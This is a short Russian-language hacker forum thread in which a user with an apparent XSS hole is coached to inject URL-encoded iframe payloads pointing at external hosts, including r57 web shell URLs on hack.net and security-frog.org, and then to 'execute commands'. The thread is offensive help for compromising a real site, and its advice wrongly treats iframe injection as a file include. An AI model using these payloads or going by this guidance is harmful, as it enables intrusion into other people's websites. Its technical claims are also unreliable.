![]() |
Xss->...
Есть уязвимость которая позволяет подставить
Код:
%3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C |
Цитата:
если это инклуд ты можешь сделать так %3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс или так %3CIFRAME%20SRC=http://hack.net/r57shell.php |
Код:
%3CIFRAME%20SRC=http://ya.ru%20%3CКод:
%3CIFRAME%20SRC=http://hack.net/r57shell.php |
значит это инклуд!!! подставляй вместо яндекса шелл
|
инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(
|
http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды можешь взять любой шелл по адресу https://forum.antichat.ru/thread20314.html |
как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...
|
вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php |
Error 404!
/hack/r57shell-inversa.php File Not Found! |
Цитата:
|
| Время: 17:55 |